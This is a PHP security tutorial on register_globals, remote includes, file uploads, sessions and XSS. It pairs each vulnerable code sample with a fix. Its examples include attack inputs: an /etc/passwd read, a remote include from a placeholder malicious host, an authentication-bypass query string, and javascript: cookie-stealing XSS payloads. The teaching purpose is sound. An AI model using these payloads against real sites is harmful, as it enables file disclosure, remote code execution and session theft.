PHP Programming Guidelines (Part 1)

1. Introduction

PHP (a recursive acronym for PHP: Hypertext Preprocessor) is a widely used server-side scripting language for creating dynamic web pages. Server-side means that the code is interpreted on the server before the result is sent to the client. PHP code can be embedded directly in HTML, and the language is easy to get started with while still being powerful enough for experienced programmers. However, being extremely feature-rich and easy to get started with is not purely positive: it too often leads to insecure applications that are vulnerable to several kinds of attack. This paper tries to explain the most common attacks and how we can protect ourselves against them.
Note: PHP is open-source and freely downloadable from www.php.net.

2. Global variables

2.1. Introduction

Variables declared outside of functions are considered global by PHP. Conversely, a variable declared inside a function is local to that function.
PHP handles global variables quite differently from languages like C. In C, a global variable is visible inside every function as well, as long as it is not shadowed by a local declaration. In PHP things are different: to access a global variable from local scope, you have to declare it global in that scope. The following example shows this:

$sTitle = 'Page title'; // Global scope

function printTitle()
{
global $sTitle; // Declare the variable as global

echo $sTitle; // Now we can access it just like it was a local variable
}
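To make the difference concrete, here is a small sketch contrasting a function that forgets the global declaration with one that uses it. It also shows the built-in $GLOBALS array, another way of reaching global variables from local scope. The function names are made up for illustration, and the sketch assumes it runs as a standalone script, so that $sTitle really is in global scope:

```php
<?php
$sTitle = 'Page title'; // Global scope

// Without a global declaration, $sTitle inside the function is a new,
// undefined local variable. isset() avoids an "undefined variable" warning.
function titleWithoutGlobal(): ?string
{
    return isset($sTitle) ? $sTitle : null;
}

// The global keyword binds the local name to the global variable.
function titleWithGlobal(): string
{
    global $sTitle;
    return $sTitle;
}

// $GLOBALS holds every global variable and is available in any scope.
function titleViaGlobalsArray(): string
{
    return $GLOBALS['sTitle'];
}

var_dump(titleWithoutGlobal());    // NULL
echo titleWithGlobal(), "\n";      // Page title
echo titleViaGlobalsArray(), "\n"; // Page title
```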

All variables in PHP are represented by a dollar sign followed by the name of the variable. The names are case-sensitive and must start with a letter or underscore, followed by any number of letters, numbers, or underscores.
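The naming rule can be expressed as a regular expression. The pattern below is the one given in the PHP manual, where "letter" also covers the bytes 128 through 255, so names written in UTF-8 are accepted as well. The function name isValidVariableName is hypothetical:

```php
<?php
// Checks whether $sName (without the leading $) is a valid PHP variable name.
// The D modifier makes $ match only at the very end of the string.
function isValidVariableName(string $sName): bool
{
    return preg_match('/^[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff]*$/D', $sName) === 1;
}

var_dump(isValidVariableName('sTitle'));  // bool(true)
var_dump(isValidVariableName('_count2')); // bool(true)
var_dump(isValidVariableName('2fast'));   // bool(false): starts with a digit
var_dump(isValidVariableName('my-var'));  // bool(false): contains a dash
```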

2.2. register_globals

The register_globals directive makes input from GET, POST and COOKIE, as well as session variables and uploaded files, directly accessible as global variables in PHP. This single directive, if set in php.ini, is the root of many vulnerabilities in web applications.
Let's start by having a look at an example:

if ( $bIsAlwaysFalse )
{
// This is never executed:
$sFilename = 'somefile.php';
}

...

if ( $sFilename != '' )
{
// Open $sFilename and send its contents to the browser
...
}

If we called this page as page.php?sFilename=/etc/passwd with register_globals enabled, it would be the same as writing the following:

$sFilename = '/etc/passwd'; // This is done internally by PHP

if ( $bIsAlwaysFalse )
{
// This is never executed:
$sFilename = 'somefile.php';
}

...

if ( $sFilename != '' )
{
// Open $sFilename and send its contents to the browser
...
}

PHP takes care of the $sFilename = '/etc/passwd'; part for us. What this means is that a malicious user could inject his/her own value for $sFilename and view any file readable under the current security context.
We should always, and I will say it again, we should always ask "what if?" when writing code. Turning off register_globals might be a solution, but what if our code ends up on a server with register_globals on? We must bear in mind that all variables in global scope could have been tampered with. The correct way to write the above code is to make sure that we always assign a value to $sFilename:

// We initialize $sFilename to an empty string
$sFilename = '';

if ( $bIsAlwaysFalse )
{
// This is never executed:
$sFilename = 'somefile.php';
}

...

if ( $sFilename != '' )
{
// Open $sFilename and send its contents to the browser
...
}
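register_globals was deprecated in PHP 5.3.0 and removed in PHP 5.4.0, so to try the example on a current PHP version we can emulate it with extract(), which turns array keys into variables in the current scope. This is only a sketch: the function names and the $aRequest parameter are illustrative, and the array stands in for the request data:

```php
<?php
function vulnerable(array $aRequest): string
{
    extract($aRequest); // Emulates what register_globals did before our code ran

    $bIsAlwaysFalse = false;

    if ( $bIsAlwaysFalse )
    {
        $sFilename = 'somefile.php'; // Never executed
    }

    // We never initialized $sFilename ourselves, so the caller controls it.
    return isset($sFilename) ? $sFilename : '';
}

function safe(array $aRequest): string
{
    extract($aRequest); // Emulates register_globals

    $bIsAlwaysFalse = false;
    $sFilename = ''; // Always initialize before use

    if ( $bIsAlwaysFalse )
    {
        $sFilename = 'somefile.php'; // Never executed
    }

    return $sFilename;
}

$aAttack = ['sFilename' => '/etc/passwd'];
echo vulnerable($aAttack), "\n"; // /etc/passwd
var_dump(safe($aAttack));        // string(0) ""
```

The same danger applies to any code that calls extract() on request data, which is a good reason not to do that.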

Another solution is to keep as little code as possible in global scope. Object-oriented programming (OOP) is a real beauty when done right, and I highly recommend that approach. We can write almost all of our code in classes, which is generally safer and promotes reuse.
Just as we should never assume that register_globals is off, we should never assume that it is on. The correct way to get input from GET, POST, COOKIE, etc. is to use the superglobals that were added in PHP 4.1.0: the $_GET, $_POST, $_ENV, $_SERVER, $_COOKIE, $_REQUEST, $_FILES and $_SESSION arrays. They are called superglobals because they are always available, regardless of scope.
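Since a superglobal entry may be missing, or may even be an array (a query string such as ?sName[]=x produces one), a small helper for reading string input can be handy. getString() below is a hypothetical helper, not a built-in PHP function:

```php
<?php
// Returns $aSource[$sKey] if it exists and is a string, otherwise $sDefault.
function getString(array $aSource, string $sKey, string $sDefault = ''): string
{
    if ( isset($aSource[$sKey]) && is_string($aSource[$sKey]) )
    {
        return $aSource[$sKey];
    }

    return $sDefault;
}

// Usage with the real superglobals:
$sName = getString($_GET, 'sName');
$sPassword = getString($_POST, 'sPassword');
```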

2.3. Includes and Remote files

The PHP language constructs include() and require() provide an easy way of including and evaluating files. When a file is included, the code it contains inherits the variable scope of the line on which the include statement was executed. All variables available at that line are available within the included file and, the other way around, variables defined in the included file are available to the calling page within the current scope.
The included file does not have to be on the local computer. If the allow_url_fopen directive is enabled in php.ini, you can specify the file to be included using a URL, and PHP will fetch it over HTTP instead of reading a local path. While this is a nice feature, it can also be a big security risk. Note: The allow_url_fopen directive is enabled by default. (Since PHP 5.2.0, including remote files additionally requires the allow_url_include directive, which is disabled by default.)
A common mistake is forgetting that every file can be requested directly: a file written only to be included can just as well be called directly by a malicious user. An example:

// file.php

$sIncludePath = '/inc/';

include($sIncludePath . 'functions.php');

...

// functions.php

include($sIncludePath . 'datetime.php');
include($sIncludePath . 'filesystem.php');

In the above example, functions.php is not meant to be called directly, so it assumes $sIncludePath is set by the calling page. With register_globals enabled, a malicious user could place files called datetime.php and filesystem.php on another server (with PHP processing turned off on that server, so the files are served as source code rather than executed) and call functions.php like this:
functions.php?sIncludePath=http://malicioushost/
PHP would happily download datetime.php from the other server and execute it, which means a malicious user could execute code of his/her choice in functions.php.
I would recommend against includes within includes (as in the example above). In my opinion they make the code harder to understand and get an overview of. But right now we want to make the above code safe, and to do that we make sure that functions.php really is called from file.php. The code below shows one solution:

// file.php

define('SECURITY_CHECK', true);

$sIncludePath = '/inc/';

include($sIncludePath . 'functions.php');

...

// functions.php

if ( !defined('SECURITY_CHECK') )
{
// Output error message and exit.
exit('Security check failed.');
}

include($sIncludePath . 'datetime.php');
include($sIncludePath . 'filesystem.php');

The function define() defines a constant. Constants are not prefixed by a dollar sign ($), so request variables cannot create or override them, and something like functions.php?SECURITY_CHECK=1 does not get past the check.
Although not so common these days, you can still come across PHP files with the .inc extension. These files are only meant to be included by other files. What is often overlooked is that these files, if called directly, do not go through the PHP interpreter and are thus sent to the browser as plain text, source code and all. We should be consistent and stick with one extension that we know gets processed by PHP. The .php extension is the recommended one.
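A different technique from the define() check above, shown here as a sketch, is to never build include paths from variables at all. __DIR__ (available since PHP 5.3.0) is the directory of the current file and is set by PHP itself, so it cannot be supplied through the request. The inc/ directory, the whitelist and the function name resolveInclude are assumptions for illustration:

```php
<?php
// Returns an absolute path for a known include file, or null for anything
// else, including URLs such as http://malicioushost/datetime.php.
function resolveInclude(string $sName): ?string
{
    // Hypothetical whitelist of the files this application may include.
    $aAllowed = ['datetime.php', 'filesystem.php'];

    if ( !in_array($sName, $aAllowed, true) )
    {
        return null;
    }

    return __DIR__ . '/inc/' . $sName;
}

// Usage in functions.php:
// $sPath = resolveInclude('datetime.php');
// if ( $sPath !== null ) { require $sPath; }
// or, when the file name is fixed anyway: require __DIR__ . '/inc/datetime.php';
```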

2.4. File upload

PHP is a feature-rich language, and one of its built-in features is automatic handling of file uploads. When a file is uploaded to a PHP page, it is automatically saved to a temporary directory, and variables describing the uploaded file become available within the page.
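Consider the following HTML code presenting a user with an upload form:

<form enctype="multipart/form-data" action="page.php" method="post">
<input type="file" name="testfile" />
<input type="submit" value="Upload" />
</form>
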
After submitting the above form, and with register_globals enabled, new variables will be available to page.php based on the "testfile" name.
Variables set by PHP and what they will contain:

// A temporary path/filename generated by PHP. This is where the file is saved until we
// move it or it is removed by PHP if we choose not to do anything with it:
$testfile

// The original name/path of the file on the client's system:
$testfile_name

// The size of the uploaded file in bytes:
$testfile_size

// The mime type of the file if the browser provided this information. For example "image/jpeg":
$testfile_type

A common approach is to check whether $testfile is set and, if it is, start working on it right away, maybe copying it to a public directory accessible from any browser. You probably already guessed it: this is a very insecure way of working with uploaded files. The $testfile variable does not have to be the path of an uploaded file. It could just as well come from GET, POST, COOKIE, etc. A malicious user could make us work on any file on the server, which is not very pleasant.
First of all, as I mentioned before, we should not assume anything about the register_globals directive. It could be on or off for all we care; our code should work either way and, most importantly, be just as secure regardless of configuration settings. So the first thing we should do is use the $_FILES array:

// The temporary filename generated by PHP:
$_FILES['testfile']['tmp_name']

// The original name/path of the file on the client's system:
$_FILES['testfile']['name']

// The mime type of the file if the browser provided this information. For example "image/jpeg":
$_FILES['testfile']['type']

// The size of the uploaded file in bytes:
$_FILES['testfile']['size']

The built-in functions is_uploaded_file() and/or move_uploaded_file() should be called with $_FILES['testfile']['tmp_name'] to make sure that the file really was uploaded via HTTP POST. The following example shows a straightforward way of working with uploaded files:

if ( is_uploaded_file($_FILES['testfile']['tmp_name']) )
{

// Check if the file size is what we expect (optional)
if ( $_FILES['testfile']['size'] > 102400 )
{
// The size can not be over 100kB, output error message and exit.
...
}

// Validate the file name and extension based on the original name in $_FILES['testfile']['name'],
// we do not want anyone to be able to upload .php files for example.
...

// Everything is okay so far, move the file with move_uploaded_file
...
}

Note: We should always check with isset() whether a variable in the superglobal arrays is set before accessing it. I chose not to do that in the above examples to keep them as simple as possible.
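Putting the steps above together, a more complete sketch could look like the following. It also uses the error element of $_FILES['testfile'], which holds one of the UPLOAD_ERR_* constants, and it stores the file under a freshly generated name so that the client-supplied name never becomes a path on our server. The 100kB limit, the allowed extensions, the upload directory and the function names are all assumptions, and random_bytes() requires PHP 7 or later:

```php
<?php
const MAX_UPLOAD_BYTES = 102400; // 100kB, as in the example above

// Returns an error message, or null if the upload metadata looks acceptable.
function validateUpload(array $aFile, array $aAllowedExt): ?string
{
    if ( !isset($aFile['error'], $aFile['size'], $aFile['name']) )
    {
        return 'No file was uploaded.';
    }

    if ( $aFile['error'] !== UPLOAD_ERR_OK )
    {
        return 'The upload failed.';
    }

    if ( $aFile['size'] > MAX_UPLOAD_BYTES )
    {
        return 'The file may not be larger than 100kB.';
    }

    // Check the extension of the original name against a whitelist,
    // so that for example .php files are rejected.
    $sExt = strtolower(pathinfo($aFile['name'], PATHINFO_EXTENSION));
    if ( !in_array($sExt, $aAllowedExt, true) )
    {
        return 'This file type is not allowed.';
    }

    return null;
}

// Moves a validated upload into $sTargetDir under a random name.
// Returns the new path, or null on failure.
function storeUpload(array $aFile, string $sTargetDir): ?string
{
    // is_uploaded_file() rejects paths that were not uploaded via HTTP POST.
    if ( !isset($aFile['tmp_name']) || !is_uploaded_file($aFile['tmp_name']) )
    {
        return null;
    }

    $sExt = strtolower(pathinfo($aFile['name'], PATHINFO_EXTENSION));
    $sTarget = $sTargetDir . '/' . bin2hex(random_bytes(16)) . '.' . $sExt;

    return move_uploaded_file($aFile['tmp_name'], $sTarget) ? $sTarget : null;
}

// Usage in page.php (the upload directory is hypothetical):
// if ( isset($_FILES['testfile'])
//     && validateUpload($_FILES['testfile'], ['jpg', 'png']) === null )
// {
//     $sStored = storeUpload($_FILES['testfile'], '/var/www/uploads');
// }
```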

2.5. Sessions

Sessions in PHP are a way of saving user-specific variables, or "state", across subsequent page requests. This is achieved by handing a unique session id to the browser, which the browser submits with every new request. The session stays alive as long as the browser keeps sending the id and not too much time passes between requests.
The session id is generally stored in a cookie, but it can also be passed in the URL. By default, session variables are saved to files in the directory specified by the session.save_path directive in php.ini, and the filenames in this directory are based on the session ids. Each file contains the variables for that session in clear text (serialized, not encrypted).
First we are going to look at the old and insecure way of working with sessions; unfortunately this way of working with sessions is still widely used.

// first.php

// Initialize session management
session_start();

// Authenticate user
if ( ... )
{
$bIsAuthenticated = true;
}
else
{
$bIsAuthenticated = false;
}

// Register $bIsAuthenticated as a session variable
session_register('bIsAuthenticated');

echo '<a href="second.php">To second page</a>';

// second.php

// Initialize session management
session_start();

// $bIsAuthenticated is automatically set by PHP
if ( $bIsAuthenticated )
{
// Display sensitive information
...
}

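Why is this insecure? With register_globals enabled, a simple request for second.php?bIsAuthenticated=1 could bypass the authentication in first.php, because PHP turns the query string value into $bIsAuthenticated.
session_start() is called implicitly by session_register(), or by PHP if the session.auto_start directive is set in php.ini (it defaults to off). However, to be consistent and not rely on configuration settings, we always call it ourselves. Note that session_register() was deprecated in PHP 5.3.0 and removed in PHP 5.4.0, so the code above does not run on current versions of PHP at all.
The recommended way of working with sessions: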

// first.php

// Initialize session management
session_start();

// Authenticate user
if ( ... )
{
$_SESSION['bIsAuthenticated'] = true;
}
else
{
$_SESSION['bIsAuthenticated'] = false;
}

echo '<a href="second.php">To second page</a>';

// second.php

// Initialize session management
session_start();

if ( isset($_SESSION['bIsAuthenticated']) && $_SESSION['bIsAuthenticated'] === true )
{
// Display sensitive information
...
}

Not only is the above code more secure it is also, in my opinion, much cleaner and easier to understand.
Note: On a shared hosting system, remember to secure the directory containing the session files; otherwise other users might be able to read them or create custom session files for other sites.
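The check in second.php can also be kept in one place with a small helper. isAuthenticated() is a hypothetical name; it takes the session array as a parameter, which keeps it easy to test, and counts the user as authenticated only if the value is exactly true, so a missing key (for example, a visitor who never went through first.php) is treated as not authenticated:

```php
<?php
function isAuthenticated(array $aSession): bool
{
    return isset($aSession['bIsAuthenticated'])
        && $aSession['bIsAuthenticated'] === true;
}

// Usage in second.php, after session_start():
// if ( isAuthenticated($_SESSION) ) { ... display sensitive information ... }
```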

3. Cross site scripting (XSS)

3.1. XSS and PHP

Consider a guestbook application written in PHP. The visitor is presented with a form where he/she enters a message. This form is then posted to a page which saves the data to a database. When someone wishes to view the guestbook all messages are fetched from the database to be sent to the browser.
For each message in the database the following code is executed:

// $aRow contains one row from a SQL-query
...
echo '<tr>';
echo '<td>';
echo $aRow['sMessage'];
echo '</td>';
echo '</tr>';
...

What this means is that exactly what is entered in the form is later sent unchanged to every visitor's browser. Why is this a problem? Picture someone entering the character < or >; that would probably break the page's formatting. But we should be happy if that is all that happens. This leaves the page wide open to injected JavaScript, HTML, VBScript, Flash, ActiveX, etc. A malicious user could use this to present new forms, fooling users into entering sensitive data. Unwanted advertising could be added to the site. Cookies can be read with JavaScript in most browsers, and with them most session ids, leading to hijacked accounts.
What we want to do here is convert all characters that have special meaning in HTML into HTML entities. Luckily, PHP provides a function for doing just that: htmlspecialchars() converts the characters &, ", < and > into &amp;, &quot;, &lt; and &gt;. (PHP has another function called htmlentities() which converts all characters that have HTML entity equivalents, but htmlspecialchars() suits our needs perfectly.)

// The correct way to do the above would be:
...
echo '<tr>';
echo '<td>';
echo htmlspecialchars($aRow['sMessage']);
echo '</td>';
echo '</tr>';
...

One might wonder why we do not do this right away when saving the message to the database. That is just begging for trouble: we would then have to keep track of where the data in every variable comes from, and treat input from GET and POST differently from data we fetch from the database. It is much better to be consistent and call htmlspecialchars() on the data right before we send it to the browser. This should be done for all unfiltered input before it is sent to the browser.
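A short wrapper makes it easy to escape consistently at output time. escapeHtml() is a hypothetical helper; passing ENT_QUOTES makes htmlspecialchars() convert single quotes too (to &#039;), which matters for attributes delimited with single quotes, and the charset argument assumes the page is served as UTF-8:

```php
<?php
function escapeHtml(string $sText): string
{
    return htmlspecialchars($sText, ENT_QUOTES, 'UTF-8');
}

// Example row standing in for one fetched from the database.
$aRow = ['sMessage' => '<script>alert("Hi")</script>'];

echo '<tr><td>' . escapeHtml($aRow['sMessage']) . '</td></tr>', "\n";
// Outputs: <tr><td>&lt;script&gt;alert(&quot;Hi&quot;)&lt;/script&gt;</td></tr>
```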

3.2. Why htmlspecialchars is not always enough

Let's take a look at the following code:

// This page is meant to be called like: page.php?sImage=filename.jpg
echo '<img src="' . htmlspecialchars($_GET['sImage']) . '" />';

Without htmlspecialchars(), the above code would leave us completely vulnerable to XSS attacks, but why isn't htmlspecialchars() enough? Since we are already inside an HTML tag, we do not need < or > to inject malicious code. Take a look at the following:

// We change the way we call the page:
// page.php?sImage=javascript:alert(document.cookie);

// Same code as before:
echo '<img src="' . htmlspecialchars($_GET['sImage']) . '" />';

<img src="javascript:alert(document.cookie);" />

"javascript:alert(document.cookie);" passes right through htmlspecialchars() without a change. Even if some of the characters are written as HTML numeric character references, the code would still execute in some browsers:

<img src="&#106;&#97;&#118;&#97;script:alert(document.cookie);" />

There is no generic solution here other than to accept only input we know is safe; trying to filter out bad input is hard, and we are bound to miss something. Our final code would look like the following:

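// We only accept input we know is safe (in this case a valid filename).
// isset() and is_string() guard against a missing or array-valued parameter,
// and the D modifier stops $ from also matching before a trailing newline.
if ( isset($_GET['sImage']) && is_string($_GET['sImage'])
&& preg_match('/^[0-9a-z_]+\.[a-z]+$/iD', $_GET['sImage']) )
{
echo '<img src="' . $_GET['sImage'] . '" />';
}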
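The final code can be tightened a little further, shown here as a sketch: a whitelist of image extensions on top of the file name pattern, and htmlspecialchars() kept as a second line of defense even though the pattern already excludes special characters. buildImageTag() and the list of extensions are assumptions:

```php
<?php
// Returns an <img> tag for a plain file name such as "photo.jpg", or null.
function buildImageTag(string $sImage): ?string
{
    $aAllowedExt = ['jpg', 'jpeg', 'png', 'gif'];

    // Same pattern as above, with the extension captured in $aMatch[1].
    if ( !preg_match('/^[0-9a-z_]+\.([a-z]+)$/iD', $sImage, $aMatch) )
    {
        return null;
    }

    if ( !in_array(strtolower($aMatch[1]), $aAllowedExt, true) )
    {
        return null;
    }

    return '<img src="' . htmlspecialchars($sImage, ENT_QUOTES, 'UTF-8') . '" />';
}

// Usage in page.php:
$sTag = isset($_GET['sImage']) && is_string($_GET['sImage'])
    ? buildImageTag($_GET['sImage'])
    : null;

if ( $sTag !== null )
{
    echo $sTag;
}
```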
